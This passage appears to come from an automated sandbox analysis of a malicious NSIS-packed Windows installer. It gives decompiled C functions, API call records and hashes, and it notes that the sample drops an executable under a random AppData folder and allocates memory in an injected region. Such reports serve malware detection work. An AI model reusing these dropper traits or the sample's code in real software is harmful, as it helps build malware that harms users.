              						_push(0);
              						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
              							__eflags = _t45;
              							if(__eflags != 0) {
              								L10:
              								RegCloseKey(_v8);
              								return 0x3eb;
              							}
              							_t33 = E00402E41(__eflags, _v8,  &_v536, _a12);
              							__eflags = _t33;
              							if(_t33 != 0) {
              								break;
              							}
              							_push(0x105);
              							_push( &_v536);
              							_push(_t45);
              						}
              						RegCloseKey(_v8);
              						_t35 = E00406931(3);
              						if(_t35 != 0) {
              							return  *_t35(_a4, _a8, _t47, 0);
              						}
              						return RegDeleteKeyW(_a4, _a8);
              					}
              					_v12 = 0;
              					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
              						goto L10;
              					}
              					goto L3;
              				}
              				return _t27;
              			}













              APIs
              • RegEnumValueW.ADVAPI32 ref: 00402E95
              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CloseEnum$DeleteValue
              • String ID:
              • API String ID: 1354259210-0
              • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
              • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
              • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
              • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00401D81(void* __ebx, void* __edx) {
              				struct HWND__* _t30;
              				WCHAR* _t38;
              				void* _t48;
              				void* _t53;
              				signed int _t55;
              				signed int _t60;
              				long _t63;
              				void* _t65;
              
              				_t53 = __ebx;
              				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
              					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
              				} else {
              					E00402D1C(2);
              					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
              				}
              				_t55 =  *(_t65 - 0x24);
              				 *(_t65 + 8) = _t30;
              				_t60 = _t55 & 0x00000004;
              				 *(_t65 - 0x38) = _t55 & 0x00000003;
              				 *(_t65 - 0x18) = _t55 >> 0x1f;
              				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
              				if((_t55 & 0x00010000) == 0) {
              					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
              				} else {
              					_t38 = E00402D3E(0x11);
              				}
              				 *(_t65 - 0x44) = _t38;
              				GetClientRect( *(_t65 + 8), _t65 - 0x60);
              				asm("sbb esi, esi");
              				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
              				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
              				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
              					DeleteObject(_t48);
              				}
              				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
              					_push(_t63);
              					E00406483();
              				}
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t65 - 4));
              				return 0;
              			}












              APIs
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
              • Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
              • Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
              • Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 73%
              			E00401E4E(intOrPtr __edx) {
              				void* __edi;
              				int _t9;
              				signed char _t15;
              				struct HFONT__* _t18;
              				intOrPtr _t30;
              				void* _t31;
              				struct HDC__* _t33;
              				void* _t35;
              
              				_t30 = __edx;
              				_t33 = GetDC( *(_t35 - 8));
              				_t9 = E00402D1C(2);
              				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
              				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
              				ReleaseDC( *(_t35 - 8), _t33);
              				 *0x40ce08 = E00402D1C(3);
              				_t15 =  *((intOrPtr*)(_t35 - 0x20));
              				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
              				 *0x40ce0f = 1;
              				 *0x40ce0c = _t15 & 0x00000001;
              				 *0x40ce0d = _t15 & 0x00000002;
              				 *0x40ce0e = _t15 & 0x00000004;
              				E00406579(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
              				_t18 = CreateFontIndirectW(0x40cdf8);
              				_push(_t18);
              				_push(_t31);
              				E00406483();
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t35 - 4));
              				return 0;
              			}












              APIs
              • GetDC.USER32(?), ref: 00401E51
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
              • ReleaseDC.USER32 ref: 00401E84
              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CapsCreateDeviceFontIndirectRelease
              • String ID:
              • API String ID: 3808545654-0
              • Opcode ID: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
              • Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
              • Opcode Fuzzy Hash: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
              • Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E00401C43(intOrPtr __edx) {
              				int _t29;
              				long _t30;
              				signed int _t32;
              				WCHAR* _t35;
              				long _t36;
              				int _t41;
              				signed int _t42;
              				int _t46;
              				int _t56;
              				intOrPtr _t57;
              				struct HWND__* _t63;
              				void* _t64;
              
              				_t57 = __edx;
              				_t29 = E00402D1C(3);
              				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              				 *(_t64 - 0x18) = _t29;
              				_t30 = E00402D1C(4);
              				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              				 *(_t64 + 8) = _t30;
              				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
              					 *((intOrPtr*)(__ebp - 0x18)) = E00402D3E(0x33);
              				}
              				__eflags =  *(_t64 - 0x1c) & 0x00000002;
              				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
              					 *(_t64 + 8) = E00402D3E(0x44);
              				}
              				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
              				_push(1);
              				if(__eflags != 0) {
              					_t61 = E00402D3E();
              					_t32 = E00402D3E();
              					asm("sbb ecx, ecx");
              					asm("sbb eax, eax");
              					_t35 =  ~( *_t31) & _t61;
              					__eflags = _t35;
              					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
              					goto L10;
              				} else {
              					_t63 = E00402D1C();
              					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              					_t41 = E00402D1C(2);
              					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              					_t56 =  *(_t64 - 0x1c) >> 2;
              					if(__eflags == 0) {
              						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
              						L10:
              						 *(_t64 - 0x38) = _t36;
              					} else {
              						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
              						asm("sbb eax, eax");
              						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
              					}
              				}
              				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
              				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
              					_push( *(_t64 - 0x38));
              					E00406483();
              				}
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t64 - 4));
              				return 0;
              			}
















              APIs
              • SendMessageTimeoutW.USER32 ref: 00401CB3
              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
              • Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
              • Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
              • Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 58%
              			E00405E11(WCHAR* _a4) {
              				WCHAR* _t9;
              
              				_t9 = _a4;
              				_push( &(_t9[lstrlenW(_t9)]));
              				_push(_t9);
              				if( *(CharPrevW()) != 0x5c) {
              					lstrcatW(_t9, 0x40a014);
              				}
              				return _t9;
              			}





              APIs
              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E33
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CharPrevlstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 2659869361-3081826266
              • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
              • Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
              • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
              • Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00403B19() {
              				void* _t1;
              				void* _t2;
              				signed int _t11;
              
              				_t1 =  *0x40a018; // 0x354
              				if(_t1 != 0xffffffff) {
              					CloseHandle(_t1);
              					 *0x40a018 =  *0x40a018 | 0xffffffff;
              				}
              				_t2 =  *0x40a01c; // 0x350
              				if(_t2 != 0xffffffff) {
              					CloseHandle(_t2);
              					 *0x40a01c =  *0x40a01c | 0xffffffff;
              					_t11 =  *0x40a01c;
              				}
              				E00403B76();
              				return E00405C4E(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsb1C63.tmp", 7);
              			}







              APIs
              • CloseHandle.KERNEL32(00000354,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
              • CloseHandle.KERNEL32(00000350,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
              Strings
              • C:\Users\user\AppData\Local\Temp\nsb1C63.tmp, xrefs: 00403B4F
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CloseHandle
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb1C63.tmp
              • API String ID: 2962429428-455956682
              • Opcode ID: aeccf91f195f98651a37afe53933e86c148d7decc5408070ba81ae1a3102e6a3
              • Instruction ID: f4960ab97bc4c8a2d82e21847187181e2840903b19b2aeb21d370a46e1c92408
              • Opcode Fuzzy Hash: aeccf91f195f98651a37afe53933e86c148d7decc5408070ba81ae1a3102e6a3
              • Instruction Fuzzy Hash: 49E0863144471496C1346F7CAE49D853B285B4133A7204326F178F20F1C738A9574E9D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 53%
              			E00405F19(void* __eflags, intOrPtr _a4) {
              				int _t11;
              				signed char* _t12;
              				intOrPtr _t18;
              				intOrPtr* _t21;
              				signed int _t23;
              
              				E0040653C(0x425f50, _a4);
              				_t21 = E00405EBC(0x425f50);
              				if(_t21 != 0) {
              					E004067EB(_t21);
              					if(( *0x42a27c & 0x00000080) == 0) {
              						L5:
              						_t23 = _t21 - 0x425f50 >> 1;
              						while(1) {
              							_t11 = lstrlenW(0x425f50);
              							_push(0x425f50);
              							if(_t11 <= _t23) {
              								break;
              							}
              							_t12 = E0040689A();
              							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
              								E00405E5D(0x425f50);
              								continue;
              							} else {
              								goto L1;
              							}
              						}
              						E00405E11();
              						return 0 | GetFileAttributesW(??) != 0xffffffff;
              					}
              					_t18 =  *_t21;
              					if(_t18 == 0 || _t18 == 0x5c) {
              						goto L1;
              					} else {
              						goto L5;
              					}
              				}
              				L1:
              				return 0;
              			}









              APIs
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405ECA
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
              • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405F72
              • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560), ref: 00405F82
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CharNext$AttributesFilelstrcpynlstrlen
              • String ID: P_B
              • API String ID: 3248276644-906794629
              • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
              • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
              • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
              • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 89%
              			E00405518(struct HWND__* _a4, int _a8, int _a12, long _a16) {
              				int _t15;
              				long _t16;
              
              				_t15 = _a8;
              				if(_t15 != 0x102) {
              					if(_t15 != 0x200) {
              						_t16 = _a16;
              						L7:
              						if(_t15 == 0x419 &&  *0x423734 != _t16) {
              							_push(_t16);
              							_push(6);
              							 *0x423734 = _t16;
              							E00404ECD();
              						}
              						L11:
              						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
              					}
              					if(IsWindowVisible(_a4) == 0) {
              						L10:
              						_t16 = _a16;
              						goto L11;
              					}
              					_t16 = E00404E4D(_a4, 1);
              					_t15 = 0x419;
              					goto L7;
              				}
              				if(_a12 != 0x20) {
              					goto L10;
              				}
              				E004044DE(0x413);
              				return 0;
              			}






              APIs
              • IsWindowVisible.USER32(?), ref: 00405547
              • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
              • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
              • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
              • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E0040640A(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
              				int _v8;
              				long _t21;
              				long _t24;
              				char* _t30;
              
              				asm("sbb eax, eax");
              				_v8 = 0x800;
              				_t21 = E004063A9(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
              				_t30 = _a16;
              				if(_t21 != 0) {
              					L4:
              					 *_t30 =  *_t30 & 0x00000000;
              				} else {
              					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
              					_t21 = RegCloseKey(_a20);
              					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
              					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
              						goto L4;
              					}
              				}
              				return _t21;
              			}








              APIs
              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422728,00000000,?,?,KXCJDFJSKF,?,?,00406699,80000002), ref: 00406450
              • RegCloseKey.ADVAPI32(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,KXCJDFJSKF,KXCJDFJSKF,KXCJDFJSKF,00000000,00422728), ref: 0040645B
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: CloseQueryValue
              • String ID: KXCJDFJSKF
              • API String ID: 3356406503-1579689790
              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405B25(WCHAR* _a4) {
              				struct _PROCESS_INFORMATION _v20;
              				int _t7;
              
              				0x426750->cb = 0x44;
              				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20);
              				if(_t7 != 0) {
              					CloseHandle(_v20.hThread);
              					return _v20.hProcess;
              				}
              				return _t7;
              			}






              APIs
              Strings
              • Error launching installer, xrefs: 00405B38
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: Error launching installer
              • API String ID: 3712363035-66219284
              • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
              • Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
              • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
              • Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00405E5D(WCHAR* _a4) {
              				WCHAR* _t5;
              				WCHAR* _t7;
              
              				_t7 = _a4;
              				_t5 =  &(_t7[lstrlenW(_t7)]);
              				while( *_t5 != 0x5c) {
              					_push(_t5);
              					_push(_t7);
              					_t5 = CharPrevW();
              					if(_t5 > _t7) {
              						continue;
              					}
              					break;
              				}
              				 *_t5 =  *_t5 & 0x00000000;
              				return  &(_t5[1]);
              			}






              APIs
              • lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Roaming\tteegmiuoefs,004030D4,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 00405E63
              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Roaming\tteegmiuoefs,004030D4,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 00405E73
              Strings
              • C:\Users\user\AppData\Roaming\tteegmiuoefs, xrefs: 00405E5D
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: CharPrevlstrlen
              • String ID: C:\Users\user\AppData\Roaming\tteegmiuoefs
              • API String ID: 2709904686-1622495906
              • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
              • Instruction ID: 42216084ebed45f2f1fcdcce66f7b00f69915d90115442600aae12f46dcfca4c
              • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
              • Instruction Fuzzy Hash: 65D05EB2401D209AC3226718DD04DAF73ACEF5134074A482AE582A61A4D7785E8186E8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405F97(void* __ecx, CHAR* _a4, CHAR* _a8) {
              				int _v8;
              				int _t12;
              				int _t14;
              				int _t15;
              				CHAR* _t17;
              				CHAR* _t27;
              
              				_t12 = lstrlenA(_a8);
              				_t27 = _a4;
              				_v8 = _t12;
              				while(lstrlenA(_t27) >= _v8) {
              					_t14 = _v8;
              					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
              					_t15 = lstrcmpiA(_t27, _a8);
              					_t27[_v8] =  *(_t14 + _t27);
              					if(_t15 == 0) {
              						_t17 = _t27;
              					} else {
              						_t27 = CharNextA(_t27);
              						continue;
              					}
              					L5:
              					return _t17;
              				}
              				_t17 = 0;
              				goto L5;
              			}










              APIs
              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBF
              • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
              • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              APIs
                • Part of subcall function 023A126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 023A128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 023A18E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023A1960
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: 087bb012aaca77d47755108d276033efb4177b7a6996b0f73ce5bfba1f9e3653
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: E9026C25E54398E9EB61CBE4EC16BEDB7B5AF04B10F10449AE60CFA1D1D3B10A84DF16
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 023A0A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 023A0C1F
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: f3d2c6525d4fa50dc4f244531ca151cd9d4824e62e48c6076a07589df7fa40ad
